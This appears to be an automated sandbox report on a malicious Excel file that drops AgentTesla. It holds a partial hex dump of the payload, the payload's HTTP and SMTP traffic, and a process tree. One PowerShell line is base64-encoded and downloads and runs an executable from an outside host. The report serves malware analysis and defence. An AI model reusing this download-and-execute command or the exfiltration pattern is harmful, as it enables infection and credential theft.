73 09 00 00 0a 7d 02 00 00 04 2a 36 00 28 7e 00 00 06 6f 25 00 00 0a 00 2a 3e 00 02 72 c6 4c 00 70 03 6f 30 00 00 0a 00 2a 22 02 28 31 00 00 0a 00 2a 56 73 81 00 00 06 28 32 00 00 0a 74 05 00 00 02 80 03 00 00 04 2a 7e 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a c6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a ae 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a de 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a f6 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 2a 00 00 00 13 30 01 00 d3 03 00 00 00 00 00 00 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELN"0N @ `@K h@ H.textT `.rsrc @@.reloc@@B0Hs\*"(*R(s}*6(~o%*>rLpo0*"(1*Vs(2t*~rpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpzrpzrpz*rpzrpzrpzrpzrpzrpzrpzrpzrpzrpz*0rpzrpzrpzrpzrpzrpzrpzrpz
                                                Mar 22, 2021 15:36:09.679099083 CET3INData Raw: 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00 70 7a 72 01 00 00
                                                Data Ascii: rpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzrpzr
                                                Mar 22, 2021 15:36:09.679124117 CET4INData Raw: 1c 72 44 05 00 70 a2 25 1f 1d 72 30 05 00 70 a2 25 1f 1e 72 48 05 00 70 a2 25 1f 1f 72 18 05 00 70 a2 25 1f 20 72 1c 05 00 70 a2 25 1f 21 72 20 05 00 70 a2 25 1f 22 72 24 05 00 70 a2 25 1f 23 72 28 05 00 70 a2 25 1f 24 72 2c 05 00 70 a2 25 1f 25
                                                Data Ascii: rDp%r0p%rHp%rp% rp%!r p%"r$p%#r(p%$r,p%%rp%&r0p%'r0p%(rp%)rLp%*rPp%+rDp%,rLp%-rTp%.r(p%/rXp%0r4p%1rp%2rPp%3r(p%4r\p%5rp%6r8p%
                                                Mar 22, 2021 15:36:09.679167986 CET6INData Raw: 88 05 00 70 a2 25 1f 15 72 f5 24 00 70 a2 25 1f 16 72 90 05 00 70 a2 25 1f 17 72 f9 24 00 70 a2 25 1f 18 72 38 05 00 70 a2 25 1f 19 72 fd 24 00 70 a2 25 1f 1a 72 24 05 00 70 a2 25 1f 1b 72 01 25 00 70 a2 25 1f 1c 72 e9 24 00 70 a2 25 1f 1d 72 fd
                                                Data Ascii: p%r$p%rp%r$p%r8p%r$p%r$p%r%p%r$p%r$p%r%p%r%p% rHp%!rlp%"r%p%#r%p%$r%p%%rp%&r%p%'r,p%(rTp%)rp%*r\p%+r%p%,rlp%-r$p%.rp%/r
                                                Mar 22, 2021 15:36:09.679199934 CET7INData Raw: 70 a2 25 20 9f 00 00 00 72 90 05 00 70 a2 25 20 a0 00 00 00 72 50 05 00 70 a2 25 20 a1 00 00 00 72 f5 24 00 70 a2 25 20 a2 00 00 00 72 24 05 00 70 a2 25 20 a3 00 00 00 72 78 05 00 70 a2 25 20 a4 00 00 00 72 1d 25 00 70 a2 25 20 a5 00 00 00 72 20
                                                Data Ascii: p% rp% rPp% r$p% r$p% rxp% r%p% r p% rXp% r1%p% rhp% rtp% r5%p% r$p% r$p% r,p% r$p% r$p% r$p% r0p% r$p%
                                                Mar 22, 2021 15:36:09.679636002 CET8INData Raw: 00 00 72 1d 25 00 70 a2 25 20 0f 01 00 00 72 20 05 00 70 a2 25 20 10 01 00 00 72 58 05 00 70 a2 25 20 11 01 00 00 72 40 05 00 70 a2 25 20 12 01 00 00 72 94 05 00 70 a2 25 20 13 01 00 00 72 68 05 00 70 a2 25 20 14 01 00 00 72 e1 24 00 70 a2 25 20
                                                Data Ascii: r%p% r p% rXp% r@p% rp% rhp% r$p% r%%p% r$p% r,p% r$p% r$p% r$p% r0p% r$p% r$p% r0p% rp% r$p% !rp% "r
                                                Mar 22, 2021 15:36:09.679671049 CET10INData Raw: 70 a2 25 20 7e 01 00 00 72 f1 24 00 70 a2 25 20 7f 01 00 00 72 f5 24 00 70 a2 25 20 80 01 00 00 72 30 05 00 70 a2 25 20 81 01 00 00 72 88 05 00 70 a2 25 20 82 01 00 00 72 f5 24 00 70 a2 25 20 83 01 00 00 72 90 05 00 70 a2 25 20 84 01 00 00 72 f9
                                                Data Ascii: p% ~r$p% r$p% r0p% rp% r$p% rp% r$p% r8p% r$p% r$p% r%p% r$p% r$p% r%p% r%p% rHp% rlp% r%p% r%p% r%p%
                                                Mar 22, 2021 15:36:09.679711103 CET11INData Raw: 00 00 72 fd 24 00 70 a2 25 20 ee 01 00 00 72 24 05 00 70 a2 25 20 ef 01 00 00 72 01 25 00 70 a2 25 20 f0 01 00 00 72 e9 24 00 70 a2 25 20 f1 01 00 00 72 fd 24 00 70 a2 25 20 f2 01 00 00 72 05 25 00 70 a2 25 20 f3 01 00 00 72 09 25 00 70 a2 25 20
                                                Data Ascii: r$p% r$p% r%p% r$p% r$p% r%p% r%p% rHp% rlp% r%p% r%p% r%p% rp% r%p% r,p% rTp% rp% r\p% r%p% rlp% r
                                                Mar 22, 2021 15:36:09.679789066 CET13INData Raw: 70 a2 25 20 5d 02 00 00 72 90 05 00 70 a2 25 20 5e 02 00 00 72 19 25 00 70 a2 25 20 5f 02 00 00 72 2c 05 00 70 a2 25 20 60 02 00 00 72 54 05 00 70 a2 25 20 61 02 00 00 72 08 05 00 70 a2 25 20 62 02 00 00 72 5c 05 00 70 a2 25 20 63 02 00 00 72 1d
                                                Data Ascii: p% ]rp% ^r%p% _r,p% `rTp% arp% br\p% cr%p% drlp% er$p% frp% grPp% hr$p% ir$p% jrxp% kr%p% lr p% mrXp% nr\p% or,p% pr p%
                                                Mar 22, 2021 15:36:09.679801941 CET14INData Raw: 00 00 72 50 05 00 70 a2 25 20 cd 02 00 00 72 f5 24 00 70 a2 25 20 ce 02 00 00 72 24 05 00 70 a2 25 20 cf 02 00 00 72 78 05 00 70 a2 25 20 d0 02 00 00 72 1d 25 00 70 a2 25 20 d1 02 00 00 72 20 05 00 70 a2 25 20 d2 02 00 00 72 58 05 00 70 a2 25 20
                                                Data Ascii: rPp% r$p% r$p% rxp% r%p% r p% rXp% rp% rp% r@p% r|p% r@p% r$p% r,p% r$p% r$p% r$p% r0p% r$p% r$p% r
                                                Mar 22, 2021 15:36:10.183279991 CET15INData Raw: 70 20 85 02 00 00 8d 01 00 00 01 25 16 72 e5 24 00 70 a2 25 17 72 2c 05 00 70 a2 25 18 72 e9 24 00 70 a2 25 19 72 dd 24 00 70 a2 25 1a 72 ed 24 00 70 a2 25 1b 72 30 05 00 70 a2 25 1c 72 f1 24 00 70 a2 25 1d 72 f5 24 00 70 a2 25 1e 72 30 05 00 70
                                                Data Ascii: p %r$p%r,p%r$p%r$p%r$p%r0p%r$p%r$p%r0p%rp%r$p%rp%r$p%r8p%r$p%r$p%r%p%r$p%r$p%r%p%r%p%rHp%rlp%r%p%r%p%r%p%r


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249167172.67.176.7880C:\Users\user\AppData\Roaming\tNDFx.exe
                                                TimestampkBytes transferredDirectionData
                                                Mar 22, 2021 15:36:18.743503094 CET136OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C294B0CA76FD09CC6E09D2031D8695F.html HTTP/1.1
                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                Host: liverpoolsupporters9.com
                                                Connection: Keep-Alive
                                                Mar 22, 2021 15:36:18.961242914 CET138INHTTP/1.1 200 OK
                                                Date: Mon, 22 Mar 2021 14:36:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Set-Cookie: __cfduid=d56c6296392c8809ad61be780b11d1ccf1616423778; expires=Wed, 21-Apr-21 14:36:18 GMT; path=/; domain=.liverpoolsupporters9.com; HttpOnly; SameSite=Lax
                                                Last-Modified: Mon, 22 Mar 2021 09:37:24 GMT
                                                Vary: Accept-Encoding
                                                X-Frame-Options: SAMEORIGIN
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 08fbf691da0000076efd03b000000001
                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=baoCFihHe3vY%2Fp9N0q%2BQez9i0k5uYbBiwb6SGE57jjPbX0awa6Y%2Fnie%2F5lHlgHEac%2FvsPnKFOE%2BYZoFd3YwfiVagq05LHaMbOu589wfAhyQ7excjCMdpn9A%3D"}],"max_age":604800}
                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                Server: cloudflare
                                                CF-RAY: 634026c95967076e-LHR
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e
                                                Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="precon
                                                Mar 22, 2021 15:36:18.961272001 CET139INData Raw: 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                Data Ascii: nect" href="https://i2-prod.liverpool.com"><link rel="dns-prefetch" href="https://felix.data.tm-awx.com"><link rel="preconnect" href="https://felix.data.tm-awx.com"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="pr
                                                Mar 22, 2021 15:36:18.961287975 CET140INData Raw: 6d 65 6c 65 6f 6e 2d 62 72 61 6e 64 69 6e 67 2f 70 75 62 6c 69 63 61 74 69 6f 6e 73 2f 6c 69 76 65 72 70 6f 6f 6c 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64
                                                Data Ascii: meleon-branding/publications/liverpool/"><link rel="preload" href="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/webfonts/woff2/SignikaNegative-Bold.47b398e81c9f2e2e.woff2" as="font" crossorigin="crossorigin"><link rel
                                                Mar 22, 2021 15:36:18.961302996 CET142INData Raw: 70 43 6f 6e 66 69 67 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 75 6e 64 65 66 69 6e 65 64 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65
                                                Data Ascii: pConfig" name="apple-itunes-app" content="app-id=undefined"><link rel="stylesheet" href="https://s2-prod.liverpool.com/@trinitymirrordigital/article-service/read-next/scss/read-next.css?v=b790533e8e5a70ffa0c2c6c8d118c407"><script type="tex
                                                Mar 22, 2021 15:36:18.961322069 CET143INData Raw: 29 2b 68 3a 6e 2c 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 69 2c 74 2e 6c 61 73 74 43 68 69 6c 64 29 7d 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2c 74 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22
                                                Data Ascii: )+h:n,t.insertBefore(i,t.lastChild)}var e=document,t=e.getElementsByTagName("head")[0],n="string",r=!1,i="push",s="readyState",o="onreadystatechange",u={},a={},f={},l={},c,h;return v.get=m,v.order=function(e,t,n){(function r(i){i=e.shift(),e.l
                                                Mar 22, 2021 15:36:18.961338997 CET145INData Raw: 2c 7b 7d 5d 7d 2c 7b 7d 2c 5b 31 5d 29 3b 0d 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 63 73 73 6c 6f 61 64 65 72 2e 6d 69 6e 2e 6a 73 2e 6d 61 70 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77
                                                Data Ascii: ,{}]},{},[1]);//# sourceMappingURL=cssloader.min.js.map</script><script>window.dataLayer = [];</script><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({"gtm.start":new Date().getTime(),event:"gtm.js"});var f=d.getElementsByTagName
                                                Mar 22, 2021 15:36:18.961352110 CET145INData Raw: 61 72 2c 20 62 75 74 20 74 68 61 74 20 6d 69 67 68 74 20 62 65 20 61 62 6f 75 74 20 74 6f 20 63 68 61 6e 67 65 20 2d 20 4c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22
                                                Data Ascii: ar, but that might be about to change - Liverpool.com</title><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="Rhian
                                                Mar 22, 2021 15:36:19.154963017 CET146INData Raw: 37 66 66 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 47 47 20 67 59 20 74 64 64 20 59 20 4d 20 59 20 59 20 59 20 64 20 59 20 59 20 59 20 71 6d 6d 20 71 6d 6d 20 59 20 59 20 74 70 64 20 59
                                                Data Ascii: 7ff9<meta name="keywords" content="GG gY tdd Y M Y Y Y d Y Y Y qmm qmm Y Y tpd Y Y Y Y Y Y Y cd Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y tqp Y Y Y td Mt tpc td Y tpY g qYm MM tpd t Gc qYm MM pd tYd tYm ttm Mq ttq
                                                Mar 22, 2021 15:36:19.155002117 CET148INData Raw: 20 59 20 74 67 71 20 67 63 20 4d 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20 59 20
                                                Data Ascii: Y tgq gc M Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y Y d Y Y Y qq Y Y Y qd Y Y Y cd Y Y Y cc Y Y Y cp Y Y Y GY Y Y Y Gq Y Y Y Gd Y Y Y Gc Y Y Y gq Y Y Y gd Y Y Y Y Y Y Y p Y Y Y tq Y Y Y tc Y Y Y qq Y Y Y
                                                Mar 22, 2021 15:36:19.155023098 CET149INData Raw: 64 20 74 74 6d 20 74 4d 71 20 59 20 59 20 74 59 20 74 71 70 20 74 4d 4d 20 74 20 59 20 64 20 64 71 20 63 71 20 59 20 71 20 71 20 70 59 20 74 64 71 20 74 59 6d 20 71 4d 20 71 74 70 20 64 59 20 74 63 20 59 20 59 20 64 4d 20 59 20 64 71 20 71 63 20
                                                Data Ascii: d ttm tMq Y Y tY tqp tMM t Y d dq cq Y q q pY tdq tYm qM qtp dY tc Y Y dM Y dq qc dY tYM Y Y c dq Y qG dp q Y tGd Y Y Y t Y Y tG Y ttd t Y Y ttq qmd td t Y ttd dM Y Y ttq qmd td q Y ttm qt Y Y tY qmd td M Y qmd tq t Y dY t Y Y dM ttt qM Y Y tY
                                                Mar 22, 2021 15:36:19.155038118 CET151INData Raw: 59 20 74 59 20 71 6d 64 20 74 64 20 64 20 59 20 6d 63 20 6d 63 20 59 20 59 20 59 20 71 6d 64 20 74 4d 20 64 20 59 20 64 59 20 71 64 20 59 20 59 20 74 59 20 71 6d 64 20 74 64 20 6d 20 59 20 71 6d 64 20 74 71 20 6d 20 59 20 64 59 20 71 6d 20 59 20
                                                Data Ascii: Y tY qmd td d Y mc mc Y Y Y qmd tM d Y dY qd Y Y tY qmd td m Y qmd tq m Y dY qm Y Y tY qmd tq q Y dY qc Y Y tY qtp qmd td c Y qmd tq M Y qmd tq c Y dY qG Y Y tY ttt qp Y Y tY Mp Y qmd tM d Y dY qg Y Y tY qmd td G Y qmd tq G Y mp tGp qmm qmm qm


                                                SMTP Packets

                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Mar 22, 2021 15:37:54.724102974 CET58749168198.54.116.63192.168.2.22220-server120.web-hosting.com ESMTP Exim 4.94 #2 Mon, 22 Mar 2021 10:37:54 -0400
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Mar 22, 2021 15:37:54.724512100 CET49168587192.168.2.22198.54.116.63EHLO 226546
                                                Mar 22, 2021 15:37:54.916032076 CET58749168198.54.116.63192.168.2.22250-server120.web-hosting.com Hello 226546 [84.17.52.78]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-X_PIPE_CONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Mar 22, 2021 15:37:54.919426918 CET49168587192.168.2.22198.54.116.63AUTH login bWFpbEBqaXJhdGFuZS5jb20=
                                                Mar 22, 2021 15:37:55.110783100 CET58749168198.54.116.63192.168.2.22334 UGFzc3dvcmQ6
                                                Mar 22, 2021 15:37:55.313492060 CET58749168198.54.116.63192.168.2.22235 Authentication succeeded
                                                Mar 22, 2021 15:37:55.314274073 CET49168587192.168.2.22198.54.116.63MAIL FROM:<mail@jiratane.com>
                                                Mar 22, 2021 15:37:55.505429983 CET58749168198.54.116.63192.168.2.22250 OK
                                                Mar 22, 2021 15:37:55.505986929 CET49168587192.168.2.22198.54.116.63RCPT TO:<root@jiratane.com>
                                                Mar 22, 2021 15:37:55.701775074 CET58749168198.54.116.63192.168.2.22250 Accepted
                                                Mar 22, 2021 15:37:55.702084064 CET49168587192.168.2.22198.54.116.63DATA
                                                Mar 22, 2021 15:37:55.893100023 CET58749168198.54.116.63192.168.2.22354 Enter message, ending with "." on a line by itself
                                                Mar 22, 2021 15:37:55.896759033 CET49168587192.168.2.22198.54.116.63.
                                                Mar 22, 2021 15:37:56.096447945 CET58749168198.54.116.63192.168.2.22250 OK id=1lOLgp-003DOA-QA
                                                Mar 22, 2021 15:40:41.094693899 CET58749168198.54.116.63192.168.2.22421 server120.web-hosting.com: SMTP command timeout - closing connection

                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: EXCEL.EXE PID: 2360 Parent PID: 584

                                                General

                                                Start time:15:35:38
                                                Start date:22/03/2021
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase:0x13f5a0000
                                                File size:27641504 bytes
                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 2028 Parent PID: 2360

                                                General

                                                Start time:15:35:40
                                                Start date:22/03/2021
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                                                Imagebase:0x4a410000
                                                File size:345088 bytes
                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: powershell.exe PID: 1320 Parent PID: 2028

                                                General

                                                Start time:15:35:41
                                                Start date:22/03/2021
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AcwBwAGUAYwBmAGwAbwBvAHIAcwAuAG4AZQB0AC8AZABlAHYALwBpAG4AYwBvAG0AZQAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAdABOAEQARgB4AC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdABOAEQARgB4AC4AZQB4AGUA
                                                Imagebase:0x13f270000
                                                File size:473600 bytes
                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: 00000004.00000002.2109712096.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: tNDFx.exe PID: 2288 Parent PID: 1320

                                                General

                                                Start time:15:35:48
                                                Start date:22/03/2021
                                                Path:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\tNDFx.exe'
                                                Imagebase:0x8e0000
                                                File size:69736 bytes
                                                MD5 hash:B2AB5D8639C89D42ACBDC362B86ACA91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2134883837.0000000006A8F000.00000004.00000001.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 28%, ReversingLabs
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: cmd.exe PID: 2760 Parent PID: 2288

                                                General

                                                Start time:15:35:56
                                                Start date:22/03/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                Imagebase:0x4a720000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: timeout.exe PID: 2916 Parent PID: 2760

                                                General

                                                Start time:15:35:57
                                                Start date:22/03/2021
                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                Wow64 process (32bit):true
                                                Commandline:timeout 1
                                                Imagebase:0x390000
                                                File size:27136 bytes
                                                MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: tNDFx.exe PID: 824 Parent PID: 2288

                                                General

                                                Start time:15:35:58
                                                Start date:22/03/2021
                                                Path:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Imagebase:0x8e0000
                                                File size:69736 bytes
                                                MD5 hash:B2AB5D8639C89D42ACBDC362B86ACA91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Chronological Activities

                                                Analysis Process: tNDFx.exe PID: 2484 Parent PID: 2288

                                                General

                                                Start time:15:35:59
                                                Start date:22/03/2021
                                                Path:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Imagebase:0x8e0000
                                                File size:69736 bytes
                                                MD5 hash:B2AB5D8639C89D42ACBDC362B86ACA91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2350984768.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2351680461.000000000226B000.00000004.00000001.sdmp, Author: Joe Security
